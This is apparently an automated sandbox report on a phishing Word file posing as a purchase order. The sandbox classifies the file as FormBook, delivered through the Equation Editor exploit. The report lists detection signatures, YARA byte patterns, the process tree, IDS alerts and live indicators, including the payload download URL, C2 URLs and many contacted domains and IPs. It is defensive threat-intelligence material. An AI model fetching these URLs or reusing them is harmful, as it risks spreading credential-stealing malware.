Windows Analysis Report
MOQ010524Purchase order.doc

Overview

General Information

Sample name: MOQ010524Purchase order.doc
Analysis ID: 1435172
MD5: 7ebb7f9239d5dea3e17fd9b51f12c5a7
SHA1: 8b73d2e1bf47b9150706d3fbfad2878447e750bf
SHA256: 49eae141b85b2dee809a1e86df1518d2d32a79367cf1a01f55f98c98d32f59ce
Tags: doc

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic
Yara detected FormBook
.NET source code references suspicious native API functions
Document exploit detected (process start blacklist hit)
Drops PE files with a suspicious file extension
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Microsoft Office Child Process
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches the installation path of Mozilla Firefox
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Screensaver Binary File Creation
Stores large binary data to the registry
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 2644 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 1808 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • op55336.scr (PID: 3192 cmdline: "C:\Users\user\AppData\Roaming\op55336.scr" MD5: 3CCB984FD28AFEA83F2F2E8A6ED4CCFA)
        • op55336.scr (PID: 3224 cmdline: "C:\Users\user\AppData\Roaming\op55336.scr" MD5: 3CCB984FD28AFEA83F2F2E8A6ED4CCFA)
          • eDTvjJMLUGCaWhgZ.exe (PID: 2584 cmdline: "C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • dfrgui.exe (PID: 3372 cmdline: "C:\Windows\SysWOW64\dfrgui.exe" MD5: FB036244DBD2FADC225AD8650886B641)
              • eDTvjJMLUGCaWhgZ.exe (PID: 2848 cmdline: "C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
              • firefox.exe (PID: 3760 cmdline: "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe" MD5: C2D924CE9EA2EE3E7B7E6A7C476619CA)
    • EQNEDT32.EXE (PID: 3396 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
MOQ010524Purchase order.doc | INDICATOR_RTF_MalVer_Objects | Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. | ditekSHen
  • 0xb441:$obj2: \objdata
  • 0xb459:$obj3: \objupdate
  • 0xb41d:$obj4: \objemb

Source | Rule | Description | Author | Strings
0000000E.00000002.479625649.0000000000350000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000E.00000002.479625649.0000000000350000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x389b7:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x22836:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.847226726.00000000003A0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000008.00000002.847226726.00000000003A0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2b3c0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1523f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.847107222.0000000000080000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

Source | Rule | Description | Author | Strings
6.2.op55336.scr.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
6.2.op55336.scr.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2ea03:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x18882:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
6.2.op55336.scr.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
6.2.op55336.scr.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2dc03:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17a82:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
5.2.op55336.scr.3506390.5.unpack | MALWARE_Win_DLInjector02 | Detects downloader injector | ditekSHen
  • 0x6b46b:$x1: In$J$ct0r

            System Summary

            Source: Network Connection | Author: Max Altgelt (Nextron Systems): Data: DestinationIp: 104.21.74.191, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1808, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
            Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\op55336.scr", CommandLine: "C:\Users\user\AppData\Roaming\op55336.scr", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\op55336.scr, NewProcessName: C:\Users\user\AppData\Roaming\op55336.scr, OriginalFileName: C:\Users\user\AppData\Roaming\op55336.scr, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1808, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\op55336.scr", ProcessId: 3192, ProcessName: op55336.scr
            Source: File created | Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1808, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\opp[1].scr
            Source: File created | Author: frack113: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1808, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\opp[1].scr
            Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1808, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
            Source: File created | Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 2644, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
            Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
            05/02/24-08:28:41.519542 | 2855465 | 49185 | 80 | TCP | A Network Trojan was detected
            05/02/24-08:29:16.698315 | 2855465 | 49193 | 80 | TCP | A Network Trojan was detected
            05/02/24-08:29:58.393847 | 2855465 | 49201 | 80 | TCP | A Network Trojan was detected
            05/02/24-08:27:38.140761 | 2855465 | 49169 | 80 | TCP | A Network Trojan was detected
            05/02/24-08:29:36.365325 | 2855465 | 49197 | 80 | TCP | A Network Trojan was detected
            05/02/24-08:28:05.644786 | 2855465 | 49177 | 80 | TCP | A Network Trojan was detected
            05/02/24-08:29:01.993967 | 2855465 | 49189 | 80 | TCP | A Network Trojan was detected
            05/02/24-08:27:51.914592 | 2855465 | 49173 | 80 | TCP | A Network Trojan was detected
            05/02/24-08:26:56.872559 | 2855465 | 49164 | 80 | TCP | A Network Trojan was detected
            05/02/24-08:28:23.793699 | 2855465 | 49181 | 80 | TCP | A Network Trojan was detected

            AV Detection

            Source: https://universalmovies.top/opp.scr | Avira URL Cloud: Label: phishing
            Source: https://universalmovies.top/opp.scrhhC: | Avira URL Cloud: Label: phishing
            Source: https://universalmovies.top/opp.scrj | Avira URL Cloud: Label: phishing
            Source: http://www.terelprime.com/ufuh/?pl=YGhnx96XAVFPN8tw+HM+ERdVPj6qvRaWteKDUnkDVIOF49Ku923zFB1LHsiTDOOJR3oxDyM0OU58BlZHZbBCNvk4uEj8jDacBIFePGWcdtykoT8enibuKQ6eq0+l&5h1t=6H6PKFvXjtI4u8k | Avira URL Cloud: Label: malware
            Source: https://universalmovies.top/ | Avira URL Cloud: Label: phishing
            Source: universalmovies.top | Virustotal: Detection: 23%
            Source: MOQ010524Purchase order.doc | Virustotal: Detection: 41%
            Source: MOQ010524Purchase order.doc | ReversingLabs: Detection: 36%
            Source: Yara match | File source: 6.2.op55336.scr.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.op55336.scr.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0000000E.00000002.479625649.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.847226726.00000000003A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.847107222.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.411272581.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000C.00000002.847699564.0000000004DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.847192255.00000000002E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.416629798.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.847416646.0000000003360000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\AppData\Roaming\op55336.scr | Joe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\opp[1].scr | Joe Sandbox ML: detected

            Exploits

            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Network connect: IP: 104.21.74.191 Port: 443
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\op55336.scr
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: unknown | HTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49163 version: TLS 1.2
            Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: op55336.scr, 00000005.00000002.351721062.0000000002491000.00000004.00000800.00020000.00000000.sdmp, op55336.scr, 00000005.00000002.351512154.00000000003B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dfrgui.pdb source: eDTvjJMLUGCaWhgZ.exe, 00000007.00000003.395166621.0000000001C60000.00000004.00000001.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 00000007.00000003.395327536.0000000001E30000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: eDTvjJMLUGCaWhgZ.exe, 00000007.00000002.847158763.00000000001FE000.00000002.00000001.01000000.00000008.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847139863.00000000001FE000.00000002.00000001.01000000.00000008.sdmp
            Source: Binary string: dfrgui.pdb2D source: eDTvjJMLUGCaWhgZ.exe, 00000007.00000003.395166621.0000000001C60000.00000004.00000001.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 00000007.00000003.395327536.0000000001E30000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: op55336.scr, op55336.scr, 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847379947.0000000002170000.00000040.00001000.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847379947.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000003.410885708.0000000001E80000.00000004.00000020.00020000.00000000.sdmp

            Software Vulnerabilities

            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
            Source: global trafficDNS query: name: universalmovies.top
            Source: global trafficDNS query: name: www.besthomeincome24.com
            Source: global trafficDNS query: name: www.terelprime.com
            Source: global trafficDNS query: name: www.sqlite.org
            Source: global trafficDNS query: name: www.99b6q.xyz
            Source: global trafficDNS query: name: www.99b6q.xyz
            Source: global trafficDNS query: name: www.99b6q.xyz
            Source: global trafficDNS query: name: www.99b6q.xyz
            Source: global trafficDNS query: name: www.kinkynerdspro.blog
            Source: global trafficDNS query: name: www.xn--matfrmn-jxa4m.se
            Source: global trafficDNS query: name: www.primeplay88.org
            Source: global trafficDNS query: name: www.aceautocorp.com
            Source: global trafficDNS query: name: www.mrart.co.kr
            Source: global trafficDNS query: name: www.touchclean.top
            Source: global trafficDNS query: name: www.ibistradingco.com
            Source: global trafficDNS query: name: www.jnkinteractive.co.kr
            Source: global trafficDNS query: name: www.chrisdomond.com
            Source: global trafficDNS query: name: www.chrisdomond.com
            Source: global trafficDNS query: name: www.chrisdomond.com
            Source: global trafficDNS query: name: www.chrisdomond.com
            Source: global trafficDNS query: name: www.riveramayahousing.com
            Source: global trafficDNS query: name: www.exclaimer342200213.net
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.96.161.166:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.23.162.163:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 194.9.94.86:80
            Source: global trafficTCP traffic: 192.168.2.22:49177 -> 91.195.240.19:80
            Source: global trafficTCP traffic: 192.168.2.22:49181 -> 198.12.241.35:80
            Source: global trafficTCP traffic: 192.168.2.22:49185 -> 183.111.183.31:80
            Source: global trafficTCP traffic: 192.168.2.22:49189 -> 67.223.117.189:80
            Source: global trafficTCP traffic: 192.168.2.22:49193 -> 154.41.250.58:80
            Source: global trafficTCP traffic: 192.168.2.22:49197 -> 183.111.183.31:80
            Source: global trafficTCP traffic: 192.168.2.22:49201 -> 208.91.197.13:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
